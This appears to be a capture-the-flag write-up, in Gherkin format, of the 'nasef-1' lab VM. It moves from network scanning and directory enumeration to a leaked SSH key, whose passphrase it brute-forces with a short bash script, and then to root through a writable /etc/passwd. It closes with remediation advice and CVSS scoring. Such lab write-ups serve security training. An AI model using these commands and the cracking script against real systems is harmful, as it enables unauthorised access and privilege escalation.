## Version 1.4.1
## language: en

Feature:
  TOE:
    nasef-1
  Category:
    Files or Directories Accessible to External Parties
  Location:
    http://192.168.103.4:80/goodmath.txt
  CWE:
    CWE-219: Storage of File with Sensitive Data Under Web Root
  Rule:
    REQ.339: https://fluidattacks.com/products/rules/list/339
  Goal:
    Get remote coordinates and root privileges
  Recommendation:
    It’d better avoid storing sensitive information in directories or files
    accessible to the public

  Background:
  Hacker's software:
    | <Software name>            | <Version>|
    | Kali Linux                 | 2020.4   |
    | Mozilla Firefox            | 78.3.0   |
    | Nmap                       | 7.91     |
    | Gobuster                   | 3.0.1    |
    | Openssl                    | 1.1.1    |
    | SearchSploit               | 3.8.3    |

  TOE information:
    Given a .OVF file
    When I saw its extension
    Then I executed it on vmware
    Then I saw that the machine was running ubuntu 20.04.1 [evidence](01.png)
    Then I verified which IP was assigned to me by dhcp server with the command
    """
    ip add show vmnet8
    """
    And I got the next result
    """
    vmnet8: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state
    UNKNOWN group default qlen 1000
    link/ether 00:50:56:c0:00:08 brd ff:ff:ff:ff:ff:ff
    inet 192.168.103.1/29 brd 192.168.103.7 scope global vmnet8
    valid_lft forever preferred_lft forever
    inet6 fe80::250:56ff:fec0:8/64 scope link
    valid_lft forever preferred_lft forever
    """
    And I scanned the network using nmap with the next command
    """
    nmap -sP 192.168.103.0/29
    """
    And I got the next result
    """
    Nmap scan report for 192.168.103.1
    Host is up (0.0028s latency).
    Nmap scan report for 192.168.103.4
    Host is up (0.0012s latency).
    """
    Then I knew that 192.168.103.4 was the target machine's IP address
    And I used nmap again to know which ports were opened with the command
    """
    nmap -A 192.168.103.4
    """
    And I got the next result
    """
    PORT   STATE SERVICE VERSION
    22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux;
    protocol 2.0)
    | ssh-hostkey:
    |   3072 8f:ec:55:07:54:78:a4:ee:8e:d7:95:41:62:74:77:8e (RSA)
    |   256 7c:67:19:8b:bf:73:b4:7f:82:64:df:d5:7b:ad:34:a4 (ECDSA)
    |_  256 a1:e7:61:a1:cc:6b:16:10:1c:71:fa:54:ed:89:fd:4c (ED25519)
    80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
    |_http-server-header: Apache/2.4.41 (Ubuntu)
    |_http-title: Apache2 Ubuntu Default Page: It works
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
    """
    Then I saw that port 80 was used by HTTP with Apache in its version 2.4.41
    And SSH was using openSSH in its version 8.2 on port 22

  Scenario: Normal use case
    Given HTTP was working on port 80
    Then I accessed to the main webpage on 192.168.103.4:80 using browser
    And there I saw the following web site [evidence](02.png)

  Scenario: Static detection
    Given I didn't have access to the source code
    Then I couldn't do this detection

  Scenario: Dynamic detection
    Given I didn't found out any wrong
    When I was analyzing the web server
    Then I decided to search possible hidden directories with gobuster
    Then I executed the command below
    """
    gobuster dir -u 192.168.103.4 -w /usr/share/dirbuster/wordlists/
    directory-list-2.3-medium.txt -x php,txt,html -s 200,204,301,302,307,401
    --exclude-length 278
    """
    Then I got the following result for the web server on port 80
    """
    ===============================================================
    2021/03/31 13:40:53 Starting gobuster in directory enumeration mode
    ===============================================================
    /index.html           (Status: 200) [Size: 10918]
    /goodmath.txt         (Status: 200) [Size: 2571]
    ===============================================================
    2021/03/31 13:43:29 Finished
    ===============================================================
    """
    Then I inspected goodmath.txt file
    Then I found out a private key [evidence](03.png)
    Then I copied that key in the following directory
    """
    ~/.ssh
    """
    Then I tried logging me through SSH using agentr as user
    Then it requested me for a password
    And I couldn't log me
    Then I inspected the private key one more time
    """
    -----being rsa private key-----
    Proc-Type: 4,ENCRYPTED
    DEK-Info: AES-128-CBC,6A4D21879E90C5E2F448418E600FE270
    """
    When I analyzed the third line of the private key
    Then I noted that it was ciphered with AES
    Then I tried generating the private exponent using Openssl
    Then it requested me a password too
    Then I downloaded the following wordlists from the next link
    """
    https://github.com/praetorian-inc/Hob0Rules/blob/master/wordlists/rockyou.
    txt.gz
    """
    Then I made the next code to crack that password [evidence](rdanilud.py)
    """
    #!/bin/bash
    filename='DATA.lst'
    n=1
    while read line; do
    if openssl rsa -in cipher.key -out out.key -passin pass:"$line" 2>/dev/null
    then
    echo $line
    break
    else
    echo "" > /dev/null
    fi
    n=$((n+1))
    done < $filename
    """
    And I executed that program with the downloaded wordlist [evidence](04.png)
    And thus I deciphered the private key [evidence](05.png)
    Then I copied the deciphered key to the directory below
    """
    ~/.ssh
    """

  Scenario: Exploitation
    Given previously I'd copied the private key in the SSH directory
    Then I logged me one more time using agentr as user through SSH
    And I accessed to the target system successfully [evidence](06.png)
    Then I listed the files in the user home directory
    """
    -rw-rw---- 1 agentr agentr 118 Dec 24 11:01 user.txt
    """
    Then I inspected the found file
    And there I found the first coordinate [evidence](07.png)
    Then I examined files which had setuid permission enable
    """
    /usr/bin/newgrp
    /usr/bin/fusermount
    /usr/bin/at
    /usr/bin/gpasswd
    /usr/bin/chsh
    /usr/bin/umount
    /usr/bin/mount
    /usr/bin/pkexec
    /usr/bin/passwd
    /usr/bin/sudo
    /usr/bin/chfn
    /usr/bin/su
    /usr/lib/eject/dmcrypt-get-device
    /usr/lib/dbus-1.0/dbus-daemon-launch-helper
    /usr/lib/snapd/snap-confine
    /usr/lib/openssh/ssh-keysign
    /usr/lib/policykit-1/polkit-agent-helper-1
    """
    Then I searched information about them
    And I tried privileges escalation with all of them but it didn't work
    Then I inspected information about kernel
    """
    Linux nasef1 5.4.0-42-generic #46-Ubuntu SMP Fri Jul 10 00:24:02 UTC 2020
    x86_64 x86_64 x86_64 GNU/Linux
    """
    Then I searched an exploit with searchsploit but I didn't find any for that
    Then I consulted permissions in the /etc/passwd file
    """
    -rw-r--rw- 1 root root 1763 Dec 24 10:42 /etc/passwd
    """
    Then I noted that I could read and modify that file
    Then I opened that file [evidence](08.png)
    And I added a new user with the user and group id of the root user
    Then I executed the command below to get root privileges
    """
    su rdanilud
    """
    Then I listed files in the root directory
    Then I visualized the second coordinate
    And thus I solved the challenge[evidence](09.png)

  Scenario: Remediation
    Given that sensitive information like keys is accessible to the public
    And passwords use to cipher the sensitive information are weak
    And the management files can be modified by an unauthorized user
    Then it'd better avoid storing sensitive information in public files
    And use strong passwords to cipher confidential information
    And check if management files can be modified by unprivileged users

  Scenario: Scoring
   Base: Attributes that are constants over time and organizations
     7.0/10 (High) - AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H/
   Temporal: Attributes that measure the exploit's popularity and fixability
     7.2/10 (High) - E:H/RL:O/RC:C/
   Environmental: Unique and relevant attributes to a specific user environment
     7.2/10 (High) - CR:L/IR:L/AR:L

  Scenario: Correlations
    No correlations have been found until date 2021-03-31
